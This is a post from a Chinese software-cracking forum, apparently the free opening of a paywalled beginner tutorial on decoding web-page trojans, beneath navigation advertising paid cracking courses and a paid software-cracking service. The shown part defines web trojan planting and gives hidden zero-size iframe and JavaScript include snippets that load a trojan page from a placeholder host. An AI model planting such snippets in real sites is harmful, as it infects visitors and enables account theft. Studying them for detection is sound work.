1401软件论坛总版规【新人必看】	如何正确发布收费帖子	加入vip系统学习仅需498元	免费获得1401软件安全论坛vip	开通本站VIP会员请联系QQ 564853771
论坛纪念优盘	Beyond EXE超强加密器V1.6	1401论坛破解工具包 2017-9-12	[破解班vip]入门篇	[破解班vip]基础篇
[破解班vip]脱壳篇	[破解班vip]实战篇	[破解班vip]网络验证篇	[破解班vip]零基础HOOK教程	[破解班vip]零基础易语言入门
[破解班vip]零基础c语言入门	[破解班vip]零基础Delphi编程入门	[破解班vip]寒假培训课程共7课	[破解班vip]破解提高篇	[破解班vip]易语言培训课程
[破解班vip]核心技术培训篇	[破解班vip]pe格式与pe操作	[破解班vip]2022全新封包-山寨-爆破全系列	[原创课程]c++单文档框架课程	[逆向班vip]汇编语句与反汇编基础
[逆向班vip]全自动扫雷辅助	[逆向班vip]手机模拟按键	[逆向班vip]植物大战僵尸辅助	广告位招租...	付费破解软件 +Q 564853771

查看: 3546|回复: 1

【网马解密初级篇】

[复制链接]

KingSolomon

TA的每日心情

	开心 2016-12-31 19:24

签到天数: 148 天

[LV.7]常住居民III

335 主题	380 回帖	1693 积分

版主

【KingSolomon】

UID: 972
元宝: 340
威望: 458
贡献: 19
信誉值: 0
精华: 17
在线时间: 179 小时
注册时间: 2014-5-16
最后登录: 2017-1-4
违规: 0
积分: 1693

发表于 2014-6-4 14:17:12 | 显示全部楼层 |阅读模式

一.  网页挂马的概念：

   网页挂马是指：在获取网站或者网站服务器的部分或者全部权限后，在网页文件中插入一段恶意代码，这些恶意代码主要是一些包括IE等漏洞利用代码，用户访问被挂马的页面时，如果系统没有更新恶意代码中利用的漏洞补丁，则会执行恶意代码程序，进行盗号等危险操作。
复制代码二.常见的网页挂马方式：

框架挂马：

  <iframe src=http://www.xxx.com/muma.htm width=0 height=0></iframe>

2.  js文件挂马:

  首先将以下代码：

document.write("<iframe width=0 height=0 src='地址'></iframe>");

保存为xxx.js，

则JS挂马代码为:

<script language=javascript src=xxx.js></script>

购买主题 已有 1 人购买 本主题需向作者支付 10 元宝 才能浏览